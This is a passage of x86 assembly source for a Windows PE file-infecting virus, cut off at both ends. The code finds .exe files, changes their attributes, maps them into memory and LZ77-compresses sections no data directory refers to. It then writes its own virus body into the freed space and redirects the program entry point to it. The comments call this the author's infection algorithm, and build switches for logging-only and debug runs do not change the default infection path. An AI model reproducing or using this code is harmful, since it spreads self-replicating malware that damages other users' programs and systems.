  cmp byte ptr [eax], 0
  jnz lb_IsBusyNow
  inc byte ptr [eax]

  sub esp, SIZE_OF_LOCAL_VARS

  push edi ; initialize lpszFileNameToOpen

if NOT_INFECT_FILES

  xor ecx, ecx
  push ecx
  push FILE_ATTRIBUTE_NORMAL
  push (OPEN_ALWAYS)
  push ecx
  push (FILE_SHARE_READ OR FILE_SHARE_WRITE)
  push (GENERIC_READ OR GENERIC_WRITE)
  lea eax, [ebx][LogFileName-@X]
  push eax
  call [ebx][lpfnCreateFileA-@X]
  cmp eax, -1
  jz lb_ExitInfectPeFile

  mov esi, eax

  xor ecx, ecx
  push FILE_END
  push ecx
  push ecx
  push esi
  call [ebx][lpfnSetFilePointer-@X]

  push 0000200h
  lea edi, [ebx+00002000h][BaseOfVirusCode-@X]
  push edi
  push -1
  lea eax, [ebx][pe_szExeFile-@X]
  push eax
  push MB_COMPOSITE
  push CP_ACP
  call [ebx][lpfnMultiByteToWideChar-@X]
  test eax, eax
  jz lb_LogFail

  push 0
  lea ecx, [ebp][dwNumberOfBytesWritten]
  push ecx
  add eax, eax
  dec eax
  dec eax
  push eax
  push edi
  push esi
  call [ebx][lpfnWriteFile-@X]
  test eax, eax
  jz lb_LogFail

  push dword ptr ':'
  mov eax, esp

  push 0
  lea ecx, [ebp][dwNumberOfBytesWritten]
  push ecx
  push 2
  push eax
  push esi
  call [ebx][lpfnWriteFile-@X]
  test eax, eax
  jz lb_LogFail

  pop eax
  pop edi
  push edi

  xor eax, eax
lp_FindNullWChar:
  movzx ecx, word ptr [edi]
  jecxz lb_WStringEnd
  inc eax
  inc eax
  inc edi
  inc edi
  jmp lp_FindNullWChar

lb_WStringEnd:

  pop edi

  push 0
  lea ecx, [ebp][dwNumberOfBytesWritten]
  push ecx
  push eax
  push edi
  push esi
  call [ebx][lpfnWriteFile-@X]
  test eax, eax
  jz lb_LogFail

  push dword ptr 000A000Dh
  mov eax, esp

  push 0
  lea ecx, [ebp][dwNumberOfBytesWritten]
  push ecx
  push 4
  push eax
  push esi
  call [ebx][lpfnWriteFile-@X]
  test eax, eax
  jz lb_LogFail

lb_LogFail:

  push esi
  call [ebx][lpfnCloseHandle-@X]

  jmp lb_ExitInfectPeFile

endif

  xor eax, eax
  mov esi, edi

lp_FindTheEndOfWideString:

  movzx ecx, word ptr [esi]
  jecxz lb_WideStringTerminate
  inc esi
  inc esi
  jmp lp_FindTheEndOfWideString

lb_WideStringTerminate:

  xor eax, eax
  push 4
  pop ecx

lp_Convert4WideCharsToAnsiChars:
  shl eax, 8
  dec esi
  dec esi
  mov al, [esi]
  loop lp_Convert4WideCharsToAnsiChars

  or eax, 20202000h
  cmp eax, 'exe.'
  jnz lb_ExitInfectPeFile

if DEBUG

  mov edx, [esi-4]
  or edx, 00200020h
  cmp edx, 00740073H
  jnz lb_ExitInfectPeFile

  mov edx, [esi-8]
  or edx, 00200020h
  cmp edx, 00650074H
  jnz lb_ExitInfectPeFile

endif

  push edi
  call [ebx][lpfnGetFileAttributesW-@X]
  cmp eax, -1
  jz lb_ExitInfectPeFile
  xchg eax, esi

  push FILE_ATTRIBUTE_NORMAL    ;<
  push edi        ;< Try to change file attributes
  call [ebx][lpfnSetFileAttributesW-@X] ;<
  test eax, eax
  jz lb_ExitInfectPeFile ;Fail to set the file attributes to FILE_ATTRIBUTE_NORMAL

  xor ecx, ecx
  push ecx
  push FILE_ATTRIBUTE_NORMAL
  push OPEN_EXISTING
  push ecx
  push (FILE_SHARE_READ OR FILE_SHARE_WRITE)
  push (GENERIC_READ OR GENERIC_WRITE)
  push edi
  call [ebx][lpfnCreateFileW-@X]
  cmp eax, -1
  jz lb_FileOpenFail

  push eax ;Initialize hFileHandle

  push esi        ;<
  push edi        ;< Restore original file attributes.
  call [ebx][lpfnSetFileAttributesW-@X] ;<

  xor ecx, ecx
  push ecx
  push ecx
  push ecx
  push PAGE_READWRITE
  push ecx
  push dword ptr [ebp][hFileHandle]
  call [ebx][lpfnCreateFileMappingW-@X]
  cmp eax, -1
  jz lb_CreateFileMappingFail

  push eax ; Initialize hFileMappingHandle

  xor ecx, ecx
  push ecx
  push ecx
  push ecx
  push FILE_MAP_WRITE
  push eax
  call [ebx][lpfnMapViewOfFile-@X]
  test eax, eax
  jz lb_MapViewOfFileFail

  push eax ;Initialize lpFileMapping

  push 0
  push dword ptr [ebp][hFileHandle]
  call [ebx][lpfnGetFileSize-@X]
  cmp eax, -1 ;Is the return value INVALID_FILE_SIZE??
  jz lb_StopInfecting
  cmp eax, 12 * 1024
  jb lb_StopInfecting
  push eax ;Initialize dwTotalFileSize

  mov eax, [ebp][lpFileMapping]
  cmp word ptr [eax], 'ZM'
  jnz lb_StopInfecting

  mov ecx, [eax+0000003Ch]  ;Maybe the file is not a PE file. So you must
  cmp ecx, [ebp][dwTotalFileSize] ;ensure the 003Ch offset is in the range of
  jae lb_StopInfecting   ;the file.

  lea edi, [eax+ecx]
  push edi ;Initialize lpNtHeaders

  cmp dword ptr [edi], 00004550h
  jnz lb_StopInfecting

  mov ecx, [edi+00000028h]
  lea edx, [eax+ecx]
  cmp [edx], dword ptr 00EC8160h
  jz lb_StopInfecting

  xor ecx, ecx
  push ecx ;Initialize ulInformation
  push ecx ;The end flag
  mov [ebp][CompressionInfoAA+off_pSection], ecx
  mov [ebp][CompressionInfoBB+off_pSection], ecx

  movzx ecx, word ptr [edi+00000006h]
  mov [ebp][i], ecx
  lea esi, [edi+000000F8h]

lp_FindCodeAndDataSection:

  mov ecx, [esi+00000010h]
  cmp ecx, 00001000h
  jb lb_TryNextSection
  mov eax, [esi+00000024h]
  cmp eax, 0C0000040h
  jz lb_DataSectionFound
  cmp eax, 60000020h
  jz lb_CodeSectionFound
  jmp lb_TryNextSection

lb_DataSectionFound:

  call CheckReferenceToSection
  jc lb_TryNextSection
  mov [ebp][CompressionInfoBB+off_pSection], esi
  jmp lb_TryNextSection

lb_CodeSectionFound:

  call CheckReferenceToSection
  jc lb_TryNextSection
  mov [ebp][CompressionInfoAA+off_pSection], esi

lb_TryNextSection:

  add esi, SIZE_OF_IMAGE_SECTION_HEADER
  dec dword ptr [ebp][i]
  jnz lp_FindCodeAndDataSection

  lea esi, [ebp][CompressionInfoAA]
  mov ecx, [esi]
  lea eax, [ebx][lpBufferForDataCompressed]
  mov [esi][off_pCompressedDataBuffer], eax
  mov [esi-DWORDSofCompressionInfo*4][off_pCompressedDataBuffer], eax
  jecxz lb_NoCodeSectionCanBeUsed

  call CompressPeSection ;Compress the code section
  cmp ecx, VIRUS_PHYSICAL_SIZE
  jae lb_OnlyCodeSectionCompressed

  ;add [esi][off_pCompressedDataBuffer], eax
  add [esi-DWORDSofCompressionInfo*4][off_pCompressedDataBuffer], eax ;Adjust the pointer

lb_NoCodeSectionCanBeUsed:

  lea esi, [ebp][CompressionInfoBB]
  cmp dword ptr [esi], 0
  jz lb_StopInfecting

  ;add [esi][off_pCompressedDataBuffer], eax
  call CompressPeSection
  cmp ecx, VIRUS_PHYSICAL_SIZE
  lea esi, [ebp][CompressionInfoAA]
  jae lb_OnlyDataSectionCompressed

  cmp dword ptr [esi], 0
  jz lb_StopInfecting

  or dword ptr [ebp][ulInformation], FLAG_USE_TWO_SECTIONS

  cmp [esi][off_ulNumFreeBytes], eax
  jae lb_Noname1

  cmp ecx, [esi][off_ulNumUsedBytes]
  jb lb_StopInfecting
  or [ebp][ulInformation], dword ptr FLAG_IN_DATA_SECTION

lb_Noname1:

  mov [ebx][JumpOffset-@X], byte ptr 0
  jmp lb_CompressionCompleted

lb_OnlyDataSectionCompressed:
  or [ebp][ulInformation], dword ptr FLAG_IN_DATA_SECTION
lb_OnlyCodeSectionCompressed:
  mov [ebx][JumpOffset-@X], byte ptr (lb_NoSecondCompressedSection - NextStatement)

;*********************************************************************
;*                                                                   *
;* My Infection algorithm:                                          *
;* 1) Try to find two sections which are not referred by any data  *
;*  directory in the PE file.                                    *
;* 2) Compress a part of the data of the section. The max size of  *
;*  the data to be compressed is 16K. Because my compression     *
;*  algorithm is not so perfect, the processing time will be     *
;*  very long if the data is too much.                           *
;* 3) If one of the sections is large enough to hold the           *
;*  compressed data and the virus code, just place there.        *
;*  Otherwise, move compressed data in one section to anther     *
;*  and just place the virus code in the section.                *
;*                                                                   *
;*********************************************************************

;1. two sections & in code section
;
;CODE_SEG    DATA_SEG
; _______     _______
;|       |   |       |
;|   D   |   |       |
;|_______|   |   V   |
;|       |   |       |
;|   C   |   |       |
;|_______|   |_______|
;
;
;2. two sections & in data section
;
;DATA_SEG    CODE_SEG
; _______     _______
;|       |   |       |
;|   C   |   |       |
;|_______|   |   V   |
;|       |   |       |
;|   D   |   |       |
;|_______|   |_______|
;
;3. one sections & in code section
;
;CODE_SEG
; _______
;|       |
;|   C   |
;|_______|
;|       |
;|   V   |
;|_______|
;
;
;4. one sections & in data section
;
;DATA_SEG
; _______
;|       |
;|   D   |
;|_______|
;|       |
;|   V   |
;|_______|


lb_CompressionCompleted:

  mov eax, [ebp][ulInformation]
  ;lea esi, [ebp][CompressionInfoAA]
  cmp eax, dword ptr (FLAG_USE_TWO_SECTIONS) ;If in code section and use two sections?
  jz lb_ExchangeCompressionInformation
  cmp eax, dword ptr (FLAG_IN_DATA_SECTION) ;If in data section and use one section?
  jz lb_ExchangeCompressionInformation

  jmp lb_SaveParameters

lb_ExchangeCompressionInformation:

  push DWORDSofCompressionInfo
  pop ecx
  lea edi, [ebp][CompressionInfoBB]

lp_ExchangeData:
  xchg eax, [edi]
  xchg eax, [edi][DWORDSofCompressionInfo*4]
  xchg eax, [edi]
  add edi, 4
  loop lp_ExchangeData

  ;lea esi, [ebp][CompressionInfoBB]

lb_SaveParameters:

  lea esi, [ebp][CompressionInfoAA]
  mov edx, [esi][off_pSection]
  lea edi, [ebx][DecompressionParametersA-@X]
  xor eax, eax
  lea ecx, [eax+1]

  test [ebp][ulInformation], dword ptr FLAG_USE_TWO_SECTIONS
  jz lb_RemainCounterTo1
  inc ecx
  mov edx, [ebp][CompressionInfoBB+off_pSection]

lb_RemainCounterTo1:

  mov [ebp][pSectionOfOriginalDataAndCode], edx

lp_SaveFileWritingInformation:

  push dword ptr [esi][off_ulNumUsedBytes]
  push dword ptr [esi][off_pCompressedDataBuffer]

  push ecx

  mov ecx, [esi][off_ulNumTotalBits]
  mov [edi], ecx ;Total number of bits
   ;mov ecx, [esi][off_pSection]
  mov ecx, [ebp][pSectionOfOriginalDataAndCode]
  mov edx, [ecx+0000000Ch]
  add edx, eax
  mov [edi+00000004h], edx ;Source data address for decompression
  mov edx, [ecx+00000014h]
  mov ecx, [esi][off_OriginalVirtualAddress]
  mov [edi+00000008h], ecx
  add edx, eax ;File offset where the compressed data will be stored.

  pop ecx
  push edx
  add eax, [esi][off_ulNumUsedBytes]
  add edi, 0000000Ch
  sub esi, DWORDSofCompressionInfo*4
  loop lp_SaveFileWritingInformation

  ;lea esi, [ebp+CompressionInfoAA][off_pSection]
  ;mov edi, [esi][off_pSection]
  mov edi, [ebp+CompressionInfoAA][off_pSection]
  mov edx, [edi+00000014h]
  mov ecx, [edi+0000000Ch]

  test [ebp][ulInformation], dword ptr FLAG_USE_TWO_SECTIONS
  jnz lb_Noname3

  add edx, eax
  add ecx, eax

lb_Noname3:

  mov [ebp][ulAddressOfVCode], ecx

  push VIRUS_PHYSICAL_SIZE
  lea ecx, [ebx][BaseOfVirusCode-@X]
  push ecx
  push edx

  mov edi, [ebp][lpNtHeaders]

  mov eax, [edi+00000080h]
  call RvaAddressToFileMappingAddress
  xchg esi, eax

lb_LoopOfFindImportDescriptorOfKernel32:

  push (SIZE_OF_IMPORT_DESCRIPTOR)
  push esi
  call IsAllZero
  jz lb_StopInfecting  ; All import descriptor have been retrieved,
        ; but kernel32 is not found. So we should do nothing
        ; but just exit.

  mov eax, [esi+0000000Ch]
  call RvaAddressToFileMappingAddress
  xchg eax, edi

  push esi
  lea esi, [ebx][NameOfKernel32-@X]
  call strcmpi
  pop esi
  jz lb_Kernel32IsFound
  add esi, SIZE_OF_IMPORT_DESCRIPTOR
  jmp lb_LoopOfFindImportDescriptorOfKernel32

lb_Kernel32IsFound:

  mov eax, [esi+00000010h]      ;< Save the address of first thunk
  mov [ebx][RvaOfFirstThunkOfKernel32-@X], eax ;<

  ;mov esi, [ebp][pDataSection]
  ;push VIRUS_PHYSICAL_SIZE
  ;lea ecx, [ebx][BaseOfVirusCode-@X]
  ;push ecx
  ;mov eax, [ebp][ulAddressOfVCode]
  ;call RvaToFilePointer
  ;push eax

  mov edi, [ebp][lpNtHeaders]     ;<
  mov eax, [ebp][ulAddressOfVCode]   ;<
  add eax, EntryOfVirusCode-BaseOfVirusCode ;< Modify Address of Entry Point
  lea ecx, [edi+00000028h]     ;< And
  mov edx, [ecx]        ;< Save Original Address of
  mov [ebx][OriginalEntryPoint-@X], edx  ;< Entry Point
  mov [ecx], eax        ;<
  mov [ebx][RvaOfEntryPoint-@X], eax   ;<


  lea ecx, [edi+00000064h]
  mov eax, VIRUS_BOOTING_SIZE
  cmp [ecx], eax
  jae lb_NotEnlargeSizeOfStackCommitSize
  add [ecx], eax
lb_NotEnlargeSizeOfStackCommitSize:

lb_LoopOfWriteTargetFile:

  pop eax
  test eax, eax
  jz lb_InfectionCompleted

  add eax, [ebp][lpFileMapping]
  xchg edi, eax

  pop esi
  pop ecx
  cld
  rep movsb

  jmp lb_LoopOfWriteTargetFile


lb_InfectionCompleted:

lb_StopInfecting:

  push dword ptr [ebp][lpFileMapping]
  call [ebx][lpfnUnmapViewOfFile-@X]

lb_MapViewOfFileFail:

  push dword ptr [ebp][hFileHandle]
  call [ebx][lpfnCloseHandle-@X]

lb_CreateFileMappingFail:

  push dword ptr [ebp][hFileMappingHandle]
  call [ebx][lpfnCloseHandle-@X]

lb_FileOpenFail:
lb_ExitInfectPeFile:

  mov byte ptr [ebx][IsBusy-@X], 0

lb_IsBusyNow:

  mov esp, ebp
  pop ebp
  ret

;*********************************************************************
;*                                                                   *
;* CompressPeSection()                                              *
;*                                                                   *
;* Remarks:                                                         *
;*  Process the specified section to make preparations for       *
;*  furher infections.                                           *
;*                                                                   *
;* Parameters:                                                      *
;*  [Esi]                                                        *
;*  Point to the start address of the buffer containing the      *
;*  parameters about data compression.                           *
;*                                                                   *
;* Return Value:                                                    *
;*  [Ecx]                                                        *
;*  The number of free bytes that can be overwritten with the    *
;*  virus code after compression.                                *
;*  [Eax]                                                        *
;*  The number of bytes that the original data of the data       *
;*  have been compressed to.                                     *
;*                                                                   *
;*********************************************************************
CompressPeSection:

  pop dword ptr [ebx][ReteunFromCompressPeSection-@X]
  mov edi, [esi][off_pSection]
  mov ecx, [edi+0000000Ch]
  mov [esi][off_OriginalVirtualAddress], ecx
  mov ecx, [edi+00000010h]
  mov edx, MAX_SIZE_TO_COMPRESS
  cmp ecx, edx
  jbe lb_UseSizeOfRawData
  mov ecx, edx

lb_UseSizeOfRawData:

  lea edx, [esi][off_ulNumTotalBits]
  and [edx], dword ptr 0

  mov eax, [edi+00000014h]
  add eax, [ebp][lpFileMapping]

  push edx
  push dword ptr [esi][off_pCompressedDataBuffer]
  push ecx
  push eax
  call LZ77Compress

  mov eax, [edx]
  test eax, eax
  jz lb_StopInfecting
  add eax, 7
  shr eax, 3

  sub ecx, eax
  jb lb_StopInfecting

  mov [esi][off_ulNumUsedBytes], eax
  mov [esi][off_ulNumFreeBytes], ecx

  push 'HOLD'
ReteunFromCompressPeSection = $-4
  ret


;*********************************************************************
;*                                                                   *
;* IsRvaInSection()                                                 *
;*                                                                   *
;* Remarks:                                                         *
;*  Check if the RVA is in the specified section.                *
;*                                                                   *
;* Parameters:                                                      *
;*  [Eax]                                                        *
;*  The RVA which will be checked.                               *
;*  [Esi]                                                        *
;*  Point to the section.                                        *
;*                                                                   *
;* Return Value:                                                    *
;*  If the Rva is in the section, both CF and ZF are cleared.    *
;*  If not, either CF or ZF is set.                              *
;*                                                                   *
;*********************************************************************
IsRvaInSection:
;{
  push edx
  mov edx, [esi+0000000Ch]
  cmp eax, edx
  jb lb_RvaNotInTheSection
  add edx, [esi+00000010h]
  cmp edx, eax
  jbe lb_RvaNotInTheSection

  pop edx
  ret

lb_RvaNotInTheSection:

  pop edx
  ret
;}


;*********************************************************************
;*                                                                   *
;* CheckReferenceToSection()                                        *
;*                                                                   *
;* Remarks:                                                         *
;*  Check if the section is referred by one or more data         *
;*  directories. If the section is referred, it cannot be used   *
;*  to write the virus code.                                     *
;*                                                                   *
;* Parameters:                                                      *
;*  [Esi]                                                        *
;*  Point to the section which will be checked.                  *
;*                                                                   *
;* Return Value:                                                    *
;*  If the section is referred, CF is set.                       *
;*  If not, CF is cleared.                                       *
;*                                                                   *
;*********************************************************************
CheckReferenceToSection:

  push ecx

  mov edx, [ebp][lpNtHeaders]
  movzx ecx, word ptr[edx+00000006h]
  add edx, 00000078h

lp_CheckAllDataDirectory:

  mov eax, [edx] ; IMAGE_EXPORT_DIRECTORY
  call IsRvaInSection
  jnbe lb_SectionIsReferred
  add edx, 8
  loop lp_CheckAllDataDirectory

  pop ecx
  clc ; Not referred
  ret

lb_SectionIsReferred:

  pop ecx
  stc ; referred
  ret

;*********************************************************************
;*                                                                   *
;* GetProcedureAddress()                                            *
;*                                                                   *
;* Remarks:                                                         *
;*  Get the entry address of the specified API function from     *
;*  the system DLLs of Windows.                                  *
;*                                                                   *
;* Parameters:                                                      *
;*  Edi: Pointer to a null-terminated string containing the API  *
;*   function name whose entry address we want to get.        *
;*  Eax: The image base of the DLL from which the API function   *
;*   is exported.                                             *
;*  Esi: Pointer to a IMAGE_EXPORT_DIRECTORY structure which     *
;*    contains the export information.                           *
;*                                                                   *
;* Return Value:                                                    *
;*  The entry address of the API function.                       *
;*                                                                   *
;*********************************************************************
GetProcedureAddress:

  mov ecx, [esi+00000018h]
  mov edx, [esi+00000020h]
  add edx, eax

  push esi

lp_FindMatchedProcedureName:

  mov esi, [edx]
  add esi, eax
  call strcmpi
  jz lb_MatchedProcedureNameFound
  add edx, 4
  loop lp_FindMatchedProcedureName

  xor eax, eax
  pop esi
  ret
lb_MatchedProcedureNameFound:

  pop esi
  sub edx, [esi+00000020h]
  ;sub edx, eax
  mov ecx, [esi+0000001Ch]
  ;add ecx, eax
  add ecx, edx
  add eax, [ecx]

  ret


;extern "C"
;void __declspec(naked) WINAPI
;LZ77Compress(
; PUCHAR __pDataBuffer,
; ULONG __ulDataLength,
; PUCHAR __pOutputBuffer,
; PULONG __pulNumberOfBits
; )
;//{

;*********************************************************************
;*                                                                   *
;* LZ77Compress()                                                   *
;*  [Param1]                                                     *
;*  [Param2]                                                     *
;*  [Param3]                                                     *
;*  [Param4]                                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  Decompress the data.                                         *
;*                                                                   *
;* Parameters:                                                      *
;*  [Param1]                                                     *
;*  Point to the buffer containing the data that will be         *
;*  compressed.                                                  *
;*  [Param2]                                                     *
;*  The total bytes of the data that will be compressed          *
;*  [Param3]                                                     *
;*  Point to the buffer where the data will be stored after      *
;*  compression.                                                 *
;*  [Param4]                                                     *
;*  Point to the variable that will save the number of bits of   *
;*  the data after compression                                   *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************

BASE_OFFSET   = (36)
pDataBuffer   = (BASE_OFFSET)
ulDataLength  = (BASE_OFFSET+4)
pOutputBuffer  = (BASE_OFFSET+8)
pulNumberOfBits  = (BASE_OFFSET+12)
iSlideWindowPtr  = (-4)
ulBytesCoded  = (-8)
ulBytesDecoded  = (-8)
ulLength   = (-12)
ulOffset   = (-16)
pSlideWindowPtr  = (-20)

LZ77Compress:

  pushad
  mov ebp, esp

  xor ebx, ebx ; Intialize ulBitOffset
  mov esi, [ebp][pDataBuffer] ; Initialize pUncodedDataPtr
  mov edi, [ebp][pOutputBuffer]

  push -MAX_WND_SIZE ; Initialize iSlideWindowPtr
  push 0    ; Initialzie ulBytesCoded
  sub esp, 3 * 4


lp_CompressDataWithLZ77:


  mov edx, [ebp][ulBytesCoded]
  cmp edx, 00001000h
  jb lb_NotAssumeDataCompressibility

  mov ecx, ebx       ;After MAX_WND_SIZE bytes data have been
  shr ecx, 3        ;compressed, we should assume the
  cmp ecx, edx       ;compressibility of the data.
  jbe lb_DataCompressibilityIsStillGood ;

  xor ebx, ebx
  jmp lb_ExitLZ77Compress

lb_NotAssumeDataCompressibility:
lb_DataCompressibilityIsStillGood:
  ;mov eax, [ebp][ulBytesCoded]
  ;cmp eax, [ebp][ulDataLength]
  mov eax, [ebp][ulDataLength]
  sub eax, [ebp][ulBytesCoded]
  jbe lb_AllBytesCompressed

  push eax
  mov eax, [ebp][iSlideWindowPtr]
  mov edx, [ebp][pDataBuffer] ; edx holds pSlideWindowPtr
  mov ecx, MAX_WND_SIZE ; ecx holds ulMaxStringLength

  cmp eax, 0
  jl lb_L01_1
  add edx, eax
  jmp lb_L01_3
lb_L01_1:
  cmp eax, -MAX_WND_SIZE
  jl lb_L01_2
  add ecx, eax
  jmp lb_L01_3
lb_L01_2:
  xor ecx, ecx
  xor edx, edx
lb_L01_3:

  pop eax
  cmp eax, ecx
  jae lb_BytesLeftMoreThanMaxWndSize
  mov ecx, eax
lb_BytesLeftMoreThanMaxWndSize:
  call FindSubStringWithMaxLength

  mov eax, [ebp][ulLength]
  cmp eax, 1
  jle lb_MatchedStringLengthIsLessThan1

  call Write1ToBitStream

  mov eax, [ebp][ulOffset]
  mov ecx, OFFSET_CODING_LENGTH
  call WriteBitsToBitStream

  mov eax, [ebp][ulLength]
  call WriteGolombCode

  mov eax, [ebp][ulLength]
  add esi, eax
  add [ebp][iSlideWindowPtr], eax
  add [ebp][ulBytesCoded], eax
  jmp lp_CompressDataWithLZ77

lb_MatchedStringLengthIsLessThan1:

  call Write0ToBitStream

  mov eax, [esi]
  push 8
  pop ecx
  call WriteBitsToBitStream

  inc esi
  inc dword ptr [ebp][iSlideWindowPtr]
  inc dword ptr [ebp][ulBytesCoded]

  jmp lp_CompressDataWithLZ77

lb_AllBytesCompressed:

lb_ExitLZ77Compress:

  mov eax, [ebp][pulNumberOfBits]
  mov [eax], ebx

  mov esp, ebp
  popad
  ret 16

;*********************************************************************
;*                                                                   *
;* WriteBitsToBitStream()                                           *
;*                                                                   *
;* Remarks:                                                         *
;*  Writing a series of bits to the bit stream.                  *
;*                                                                   *
;* Parameters:                                                      *
;*  [Edi]                                                        *
;*  Point to the base address of the bit stream. The address is  *
;*  byte-boundary.                                               *
;*  [Ebx]                                                        *
;*  The offset in the bit stream where the new bits will         *
;*  be written.                                                  *
;*  [Eax]                                                        *
;*  The bits that will be wtitten to the bit stream.             *
;*  [Ecx]:                                                       *
;*  The number of bits that will be written to the bit stream.   *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
WriteBitsToBitStream:

lp_LoopOfWritingOffset:

  shr eax, 1
  jc lb_CurrentBitIs1

  call Write0ToBitStream
  jmp lb_WriteNextBit

lb_CurrentBitIs1:

  call Write1ToBitStream

lb_WriteNextBit:

  loop lp_LoopOfWritingOffset
  ret


;*********************************************************************
;*                                                                   *
;* Write1ToBitStream()                                              *
;*                                                                   *
;* Remarks:                                                         *
;*  Writing 1 to the bit stream.                                 *
;*                                                                   *
;* Parameters:                                                      *
;*  [Edi]                                                        *
;*  Point to the base address of the bit stream. The             *
;*  address is byte-boundary.                                    *
;*  [Ebx]                                                        *
;*  The offset in the bit stream where the data 1 will           *
;*  be written.                                                  *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
Write1ToBitStream:

lb_Write1ToBitStream:

  push edx
  push ecx
  push eax
  mov eax, ebx
  shr eax, 3
  add eax, edi
  mov ecx, ebx
  and ecx, 7
  push 1
  pop edx
  shl edx, cl
  or [eax], dl
  pop eax
  pop ecx
  pop edx
  inc ebx
  ret

;*********************************************************************
;*                                                                   *
;* Write0ToBitStream                                                *
;*                                                                   *
;* Remarks:                                                         *
;*  Writing 0 to the bit stream.                                 *
;*                                                                   *
;* Parameters:                                                      *
;*  [Edi]                                                        *
;*  Point to the base address of the bit stream. The address is  *
;*  byte-boundary.                                               *
;*  [Ebx]                                                        *
;*  The offset in the bit stream where the data 0 will           *
;*  be written.                                                  *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
Write0ToBitStream:

lb_Write0ToBitStream:

  push edx
  push ecx
  push eax
  mov eax, ebx
  shr eax, 3
  add eax, edi
  mov ecx, ebx
  and ecx, 7
  push 1
  pop edx
  shl edx, cl
  not edx
  and [eax], dl
  pop eax
  pop ecx
  pop edx
  inc ebx
  ret

;*********************************************************************
;*                                                                   *
;* CompareStrings()                                                 *
;*                                                                   *
;* Remarks:                                                         *
;*  Compare two strings.                                         *
;*                                                                   *
;* Parameters:                                                      *
;*  [Ecx]                                                        *
;*  Point to string1.                                            *
;*  [Edi]                                                        *
;*  Point to string2.                                            *
;*  [Ecx]                                                        *
;*  The max length of comparation length.                        *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
CompareStrings:
;//{

  push esi
  push edi

  ;lea eax, [esi+1]
  ;cld
  ;rep cmpsb

  mov eax, esi

lp_CompareStrings:

  mov dl, [esi]
  cmp dl, [edi]
  jnz lb_StringsUnmatched
  inc esi
  inc edi
  loop lp_CompareStrings

lb_StringsUnmatched:

  sub esi, eax
  mov eax, esi

  pop edi
  pop esi

  ret
;//}


;*********************************************************************
;* FindSubStringWithMaxLength()                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  Find the sub string of string2 with the max length           *
;*  that matches string1.                                        *
;*                                                                   *
;* Parameters:                                                      *
;*  [Ecx]                                                        *
;*  The max length of string1.                                   *
;*  [Esi]                                                        *
;*  Point to string1.                                            *
;*  [Edi]                                                        *
;*  Point to string2.                                            *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
FindSubStringWithMaxLength:
;//{

  push esi
  push edi

  xor eax, eax
  mov [ebp][ulLength], eax ; Initailzie return value
  mov [ebp][ulOffset], eax ; Initialize return value
  mov [ebp][pSlideWindowPtr], edx ; Save pSlideWindowPtr
  mov edi, edx

  test edi, edi
  jz lb_ExitFindLongestSubstring

  jecxz lb_ExitFindLongestSubstring

lb_LoopOfFindSubStrings:

  push ecx
  call CompareStrings
  pop ecx

  cmp eax, [ebp][ulLength]
  jbe lb_SubStringIsNotTheLongest

  mov [ebp][ulLength], eax
  mov eax, edi
  sub eax, [ebp][pSlideWindowPtr]
  mov [ebp][ulOffset], eax


lb_SubStringIsNotTheLongest:

  inc edi
  loop lb_LoopOfFindSubStrings

lb_ExitFindLongestSubstring:
  pop edi
  pop esi
  ret
;//}

;*********************************************************************
;*                                                                   *
;*  WriteGolombCode()                                                *
;*                                                                   *
;* Remarks:                                                         *
;*  Write the Golomb code to the bit stream.                     *
;*                                                                   *
;* Parameters:                                                      *
;*  [Eax]                                                        *
;*  The value which is to be coded.                              *
;*  [Edi]                                                        *
;*  Point to start address of the bit stream.                    *
;*  [Ebx]                                                        *
;*  The offset in the bit stream where the Golomb code           *
;*  will be written.                                             *
;*                                                                   *
;* Return value:                                                    *
;*  The length of the coding.                                    *
;*                                                                   *
;*********************************************************************
WriteGolombCode:

  lea ecx, [eax-1]
  shr ecx, M ; q
  mov edx, ecx
  push ecx
  jecxz lb_QIsZero

lp_WriteQOnes:
  call Write1ToBitStream
  loop lp_WriteQOnes

lb_QIsZero:
  call Write0ToBitStream

  shl edx, M ; q<<m
  sub eax, edx ;
  dec eax   ; r = x-(q<<m)-1

  mov ecx, 1

lb_LoopOfWritingR:

  shr eax, 1
  jc lb_CurrentBitIs1_b

  call Write0ToBitStream
  jmp lb_CurrentBitIs0_b

lb_CurrentBitIs1_b:

  call Write1ToBitStream

lb_CurrentBitIs0_b:

  inc ecx
  cmp ecx, M
  jbe lb_LoopOfWritingR

  pop eax
  add eax, M+1

  ret

;//}

;extern "C"
;void __declspec(naked) WINAPI
;LZ77Decompress(
; PUCHAR __pDataBuffer,
; ULONG __ulNumberOfBits,
; PUCHAR __pOutputBuffer,
; PULONG __pulNumberOfBytes
; )
;//{

;*********************************************************************
;*                                                                   *
;* LZ77Decompress()                                                 *
;*  [Param1]                                                     *
;*  [Param2]                                                     *
;*  [Param3]                                                     *
;*  [Param4]                                                     *
;*                                                                   *
;* Remarks:                                                         *
;*  Decompress the data.                                         *
;*                                                                   *
;* Parameters:                                                      *
;*  [Param1]                                                     *
;*  Point to the buffer containing the data that will be         *
;*  decompressed.                                                *
;*  [Param2]                                                     *
;*  The total bits of the data that will be decompressed         *
;*  [Param3]                                                     *
;*  Point to the buffer where the data will be stored after      *
;*  decompression.                                               *
;*  [Param4]                                                     *
;*  The number of bytes of the data after decompression          *
;*                                                                   *
;* Return value:                                                    *
;*  None.                                                        *
;*                                                                   *
;*********************************************************************
ulNumberOfBits  = (BASE_OFFSET+4)
pOutputBuffer  = (BASE_OFFSET+8)
pulNumberOfBytes = (BASE_OFFSET+12)

LZ77Decompress:

  pushad
  mov ebp, esp

  xor ebx, ebx ; Initialize bit offset
  mov esi, [ebp][pDataBuffer]
  mov edi, [ebp][pOutputBuffer]

  push -MAX_WND_SIZE
  push 0
  sub esp, 3 * 4

lb_LZ77Decompress:

  cmp ebx, [ebp][ulNumberOfBits]
  jae lb_AllDataDecompressed

  call ReadBitFromBitStream

  test eax, eax
  jz lb_SingleCharacter

  mov eax, [ebp][iSlideWindowPtr]
  mov edx, [ebp][pOutputBuffer]

  cmp eax, 0
  jl lb_L2_a
